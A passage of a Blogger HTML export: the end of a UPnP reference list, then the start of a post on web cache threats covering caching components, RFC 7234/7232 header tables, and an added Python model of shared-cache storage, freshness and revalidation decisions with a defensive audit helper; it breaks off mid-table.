1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; 
text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><a href="http://upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v2.0.pdf">http://upnp.org/specs/arch/UPnP-arch-DeviceArchitecture-v2.0.pdf</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://tools.ietf.org/id/draft-bpw-pcp-upnp-igd-interworking-01.html">https://tools.ietf.org/id/draft-bpw-pcp-upnp-igd-interworking-01.html</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="https://tools.ietf.org/html/rfc6970">https://tools.ietf.org/html/rfc6970</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.upnp-hacks.org/">http://www.upnp-hacks.org/</a></span></p></li><li aria-level="1" dir="ltr" 
style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><a href="http://www.upnp-hacks.org/igd.html">http://www.upnp-hacks.org/igd.html</a></span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.blackhat.com/presentations/bh-usa-08/Squire/BH_US_08_Squire_A_Fox_in_the_Hen_House%20White%20Paper.pdf">https://www.blackhat.com/presentations/bh-usa-08/Squire/BH_US_08_Squire_A_Fox_in_the_Hen_House%20White%20Paper.pdf</a></span></p></li><li aria-level="1" dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre;"><a href="https://www.akamai.com/uk/en/multimedia/documents/white-paper/upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf">https://www.akamai.com/uk/en/multimedia/documents/white-paper/
upnproxy-blackhat-proxies-via-nat-injections-white-paper.pdf</a></span></span></p></li></ul></span></div></div><p></p>Alessandro Bracciohttp://www.blogger.com/profile/11077564935025195085noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-3170058117697014302021-01-26T03:12:00.001-08:002021-01-26T03:14:52.195-08:00Demystifying Web Cache Threats<h3><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiWL3jEeTLPmGyJjKXnLpPwr-d-BbCGNMHKmFBzDeq50KbLehNFFzo-VkEAfWlBu2NDbkTP-PSM4fT-KX5atRzl8fDjhWDGQaaNFwDIzwVO4UtjyTMhymBMAIhD-5NeWPFRJ-ySJvJBzUR/" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="227" data-original-width="222" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiWL3jEeTLPmGyJjKXnLpPwr-d-BbCGNMHKmFBzDeq50KbLehNFFzo-VkEAfWlBu2NDbkTP-PSM4fT-KX5atRzl8fDjhWDGQaaNFwDIzwVO4UtjyTMhymBMAIhD-5NeWPFRJ-ySJvJBzUR/" width="235" /></a></div><br /><br /></div><br />Authors</h3>
<ul>
<li>Alessandro Brucato</li>
<li>Giorgio Rando</li>
</ul>
<br />
<h3 style="text-align: left;">Introduction</h3>
<p style="text-align: left;">
Did you know the word “<i>Cache</i>” comes from French and means “<a href="https://www.etymonline.com/word/cache" target="_blank">Hidden</a>”?<br />Transposed to IT, the name fits its nature:<br />a concealed, faster memory inside the CPU,
used to overcome the bottleneck of the slower RAM connected externally via the <a href="https://en.wikipedia.org/wiki/Cache_(computing)" target="_blank">BUS</a>.<br /><br />In
general, a caching algorithm has a predefined <i>set of primary keys</i> to be
matched, so that it can retrieve or store data according to
them.<br />
The use of cache techniques has spread over time along with
technologies, resulting in features such as:
</p>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Database_caching" target="_blank">Database Caching</a></li>
<li><a href="https://www.solarwindsmsp.com/blog/dns-cache-overview" target="_blank">DNS Caching</a></li>
<li><a href="https://en.wikipedia.org/wiki/Distributed_cache" target="_blank">Distributed Cache</a></li>
</ul>
<br />
<p>
Last but not least, when it comes to <i>Web Applications</i> and <i>Web Servers</i>, caching
has become a very important feature capable of managing thousands of different
users and requests per second.<br />In this case it is known as
<b>Web Cache</b>.<br /><i>Web Cache </i>principles are:<br />
</p>
<ul style="text-align: left;">
<li>Temporary storage of Web Application generated content (usually customized
according to the different user’s data);
</li>
<li>Avoiding unnecessary <b>server overload</b>, which would otherwise be needed to
regenerate the customized content;
</li>
<li>Defining unique tuples (n-dimensional keys) per entry.</li>
</ul>
<p>
<br />When a web cache is in use, content generated by the web server is
temporarily stored in the cache memory (<i>Request #1</i> in the schema below).
The subsequent request (<i>Request #2</i>) is then answered by the web cache
and never reaches the web server.
</p>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4L4SinZnTQWBb-6Q0tjls5bRoqHx2JJjwnWlLzyblh3jEu4rbztJoQPiJxF3_5J2xd99lnMWp3_HT8SKbUmlLh0h4KX11YMeqa7WnSUb_8xj0kzFoKl2z79XARKObCTiqn9qC3QrbV-M/s312/web_cache_schema+%25281%2529.png" style="clear: right; display: block; float: right; margin-bottom: 1em; margin-left: 1em; padding: 1em 0px; text-align: center;"></a></div><h3><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ6wD_-vVk3OPMQq52DKd1FvA_NGLS7IUHXTpb13i4h6pTrpWXhcIrKXSPU3-Rf7nG9mdBn4TRTCJb_DKiXBEdDQpPcLj2z88tZy_w0P3FY75FVbhBQHsvSChjSDQUCIZ2oHGHNLFq0LV2/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="343" data-original-width="854" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ6wD_-vVk3OPMQq52DKd1FvA_NGLS7IUHXTpb13i4h6pTrpWXhcIrKXSPU3-Rf7nG9mdBn4TRTCJb_DKiXBEdDQpPcLj2z88tZy_w0P3FY75FVbhBQHsvSChjSDQUCIZ2oHGHNLFq0LV2/w640-h258/image.png" width="640" /></a></div><br /><br /></h3><h3>The Cache Flow</h3>
<p>When a client and a server interact, one or more intermediary <i>caching</i>
components may process the data, more or less transparently, during the
actual client-server communication. The following components may cache
data:
</p>
<ul>
<li><i><u>Internet Browsers</u></i>: static copies of the requested web pages are stored on the device's local disk, in order to respond faster if the requested web page has not been changed since the last request;</li>
<li><i><u>Internet Service Providers </u>(ISPs</i>): due to the huge number of requests that providers have to handle, they often rely on their own cached copies in order to limit bandwidth usage;</li>
<li><i><u>Internet Gateways</u></i>: cached pages are stored within the web server's reverse proxy in order to optimize the server's memory use, avoiding needless load on the main server;</li>
<li><i><u>Web Server Proxies</u></i>: unlike the other components, which are detached from the web server's internal network, “<i>Web Server Proxies</i>” are often deployed on the organisation's network boundary. The behaviour of this component is the same as described above for the <i>ISP</i> and<i> Internet Gateway </i>components;</li>
<li><i><u>Content Delivery Networks</u> (CDNs)</i>: users are redirected (through a <i>DNS</i> service) to <i>CDN</i> servers when they request a website that relies on a <i>CDN</i>. One of the <i>CDN</i>'s objectives is to cache, in an orderly fashion, the web pages requested from different regions;</li>
<li><i><u>Internal Servers</u>:</i> the <i>internal servers</i>' cache has the same aim as the <i>Internet Gateways</i>' one: reducing request-processing overhead by temporarily saving the requested web pages.</li>
</ul>
<br />
<p>The following diagram shows how the aforementioned components are usually distributed within a client-server communication.</p>
<div class="separator" style="clear: both;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj822WugVjSAOzZFcGMuj-SRonyFQvvz2UF0_UOCTOGYo5nkqjQtmR9GtCjyIpe9kCJWXzmZFRnO2KPM_GTe-NpwVcrc7zfklnkzy0V5WWGoIX6gHQSQDrIdtWf9svusecZbOcNPxjzZKE/s1681/components_diagram.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="851" data-original-width="1681" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj822WugVjSAOzZFcGMuj-SRonyFQvvz2UF0_UOCTOGYo5nkqjQtmR9GtCjyIpe9kCJWXzmZFRnO2KPM_GTe-NpwVcrc7zfklnkzy0V5WWGoIX6gHQSQDrIdtWf9svusecZbOcNPxjzZKE/w640-h323/components_diagram.png" width="640" /></a></div><br /><span style="text-align: left;">Each one of these components might handle its own cached copy, which is useful in a number of particular contexts. However, not every caching component can be controlled by the end user and that might pose a threat from a privacy point of view. </span></div><p><br /></p><p>
For instance, the<b><i> internet browser web cache </i></b>is fully manageable by the end user, who can delete the cached web pages at their sole discretion. </p><p>On the other hand, <b><i>ISPs</i></b> and <b><i>CDNs</i></b> (to mention just a few) work differently: they handle the cached web pages without any user interaction, according to specific HTTP directives.
<br /><br /></p><p>
Usually, these directives are conveyed through <i>HTTP Headers</i>, which the caching servers parse to understand whether a web page has changed since it was last requested.
<br /><br /></p><p>
The full set of standard headers used for caching is defined in <a href="https://tools.ietf.org/html/rfc7234#section-5" target="_blank">RFC7234</a>; some of them follow:</p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="339"></col><col width="261"></col></colgroup><tbody><tr style="height: 21pt;"><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Header</span></p></td><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Definition</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr"
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Age</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">delta-seconds</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Cache-Control</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; 
white-space: pre;">(request)</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">max-age</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">max-stale</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">min-fresh</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">only-if-cached</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-cache</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 
0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-store</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-transform</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Cache-Control</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(response)</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" 
style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">max-age</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">s-maxage</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">must-revalidate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-cache</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-store</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-transform</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span 
style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">public</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">private</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">proxy-revalidate</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Expires</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; 
font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP-date timestamp</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Pragma</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">(allows backwards compatibility with HTTP/1.0 caches)</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">no-cache, 
token</span></p></td></tr></tbody></table></div><p><br /></p>
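<p>As an added example (not code from the original post), here is a small Python model of the decisions a shared cache such as a proxy or CDN takes from the headers above, together with the conditional-request revalidation enabled by the RFC7232 headers: whether a response may be stored at all (<i>no-store</i>, <i>private</i>), how long it stays fresh (<i>s-maxage</i>, then <i>max-age</i>, then <i>Expires</i> minus <i>Date</i>, compared against <i>Age</i> plus residence time), and whether a stored copy still matches the validators (<i>ETag</i> / <i>If-None-Match</i>, <i>Last-Modified</i> / <i>If-Modified-Since</i>). All header values are constructed for illustration, and the <code>audit_response</code> helper is our own assumption of a useful check: it flags the case a tester looks for, a personalised response that sets a cookie but carries no <i>private</i> directive, so that a shared cache is allowed to store it.</p>

```python
"""Added example (not from the original post): a minimal model of the
storage, freshness and revalidation decisions a shared HTTP cache makes,
following RFC 7234 (Cache-Control, Age, Expires) and RFC 7232 (ETag,
Last-Modified, If-None-Match, If-Modified-Since). All header values
used below are constructed for illustration."""
from email.utils import parsedate_to_datetime


def parse_cache_control(value):
    """Split a Cache-Control field into {directive: argument or None}.
    Directive names are case-insensitive, so they are lower-cased."""
    directives = {}
    for part in (value or "").split(","):
        part = part.strip()
        if not part:
            continue
        name, _, arg = part.partition("=")
        directives[name.strip().lower()] = arg.strip().strip('"') if arg else None
    return directives


def shared_cache_may_store(response_headers):
    """RFC 7234 section 3: 'no-store' forbids any cache from storing the
    response and 'private' forbids shared caches (proxies, CDNs). Nothing
    else in the headers, not even Set-Cookie, stops a shared cache."""
    cc = parse_cache_control(response_headers.get("Cache-Control"))
    return "no-store" not in cc and "private" not in cc


def freshness_lifetime(response_headers, shared=True):
    """RFC 7234 section 4.2.1: s-maxage wins for shared caches, then max-age,
    then Expires minus Date. None means no explicit lifetime (the cache could
    only fall back to heuristic freshness)."""
    cc = parse_cache_control(response_headers.get("Cache-Control"))
    if shared and cc.get("s-maxage") is not None:
        return int(cc["s-maxage"])
    if cc.get("max-age") is not None:
        return int(cc["max-age"])
    if "Expires" in response_headers and "Date" in response_headers:
        expires = parsedate_to_datetime(response_headers["Expires"])
        date = parsedate_to_datetime(response_headers["Date"])
        return max(0, int((expires - date).total_seconds()))
    return None


def is_fresh(response_headers, seconds_in_cache, shared=True):
    """A stored response is fresh while freshness_lifetime > current_age,
    where current_age is the upstream Age header plus local residence time."""
    lifetime = freshness_lifetime(response_headers, shared)
    if lifetime is None:
        return False
    current_age = int(response_headers.get("Age", "0")) + seconds_in_cache
    return lifetime > current_age


def _opaque_tag(etag):
    """Weak comparison (RFC 7232 section 2.3.2) ignores the W/ prefix."""
    return etag[2:] if etag.startswith("W/") else etag


def revalidate(request_headers, stored_headers):
    """Decide a conditional GET against the stored representation: 304 when
    the validators still match, 200 when a full response must be generated.
    If-None-Match takes precedence; If-Modified-Since is only consulted when
    no entity-tag condition was sent (RFC 7232 section 6)."""
    inm = request_headers.get("If-None-Match")
    etag = stored_headers.get("ETag")
    if inm is not None:
        if etag is None:
            return 200
        candidates = [t.strip() for t in inm.split(",")]
        if "*" in candidates or any(_opaque_tag(c) == _opaque_tag(etag) for c in candidates):
            return 304
        return 200
    ims = request_headers.get("If-Modified-Since")
    last_modified = stored_headers.get("Last-Modified")
    if ims and last_modified:
        if parsedate_to_datetime(last_modified) <= parsedate_to_datetime(ims):
            return 304
    return 200


def audit_response(response_headers):
    """Assumed defender's check (not part of any RFC): flag a response that a
    shared cache may store although it looks user-specific."""
    findings = []
    if shared_cache_may_store(response_headers):
        if "Set-Cookie" in response_headers:
            findings.append("sets a cookie but is storable by shared caches")
        if freshness_lifetime(response_headers) is None:
            findings.append("no explicit freshness lifetime; heuristic caching possible")
    return findings


if __name__ == "__main__":
    # Constructed response of a personalised page that forgot 'private'.
    profile = {
        "Date": "Tue, 26 Jan 2021 11:00:00 GMT",
        "Cache-Control": "max-age=300",
        "Set-Cookie": "session=constructed-value; HttpOnly",
        "ETag": '"v1"',
    }
    print(audit_response(profile))
    print(revalidate({"If-None-Match": 'W/"v1"'}, profile))
```

<p>Run it directly to see the audit findings for the constructed profile response; the same functions can be pointed at headers captured from a real response to check what an intermediary cache is permitted to do with it, which is exactly the question the rest of this post turns on.</p>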
<p>In addition, conditional headers can be used in the request and response, in order to enforce preconditions before a cached copy of a web page is served to users.
These headers are described in <a href="https://tools.ietf.org/html/rfc7232" target="_blank">RFC7232</a>; some of them follow:</p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="289"></col><col width="261"></col></colgroup><tbody><tr style="height: 21pt;"><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Header</span></p></td><td style="background-color: #0b5394; border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: white; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Definition</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom:
0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">If-Match</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: Arial; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">entity-tag</span></p></td></tr><tr style="height: 19.5pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; 